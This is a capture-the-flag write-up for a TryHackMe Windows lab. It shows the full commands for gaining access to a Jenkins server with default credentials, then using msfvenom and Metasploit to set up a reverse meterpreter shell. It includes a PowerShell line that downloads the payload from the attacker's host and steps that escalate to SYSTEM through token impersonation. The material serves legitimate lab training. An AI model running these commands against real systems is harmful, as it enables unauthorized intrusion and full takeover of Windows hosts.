An easy Windows box from TryHackMe, get initial access through Jenkins groovy script, and abusing SeImpersonatePrivelege user rights to get SYSTEM.

Recon

Found a Jenkins instance running on the server, login with default creds

admin:admin

Exploitation

On Jenkins can execute groovy script, leverage that to get a reverse shell on the system

Create a meterpreter reverse shell payload with msfvenom

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe

Set up a handler in metasploit with

use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run

Set up a python http server, then download the reverse shell to the target using powershell with

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"

Then execute the shell.exe on target to get meterpreter shell

Running

whoami /priv

See that have SeImpersonatePrivelege enabled

Using metasploit, can load the incognito module with

load incognito

Then check which tokens can be impersonated with

list_tokens -g

And see that the BUILTIN\Administrators token is available

Using

impersonate_token "BUILTIN\Administrators"

Command to impersonate the Admin token

Running getuid see that you are NT AUTHORITY\SYSTEM

Now have a higher priveleged token but still need to migrate to a higher priveleged process, the safest process to migrate to is services.exe, migrate the meterpreter shell with

migrate PID_OF_services.exe

And now have full SYSTEM priv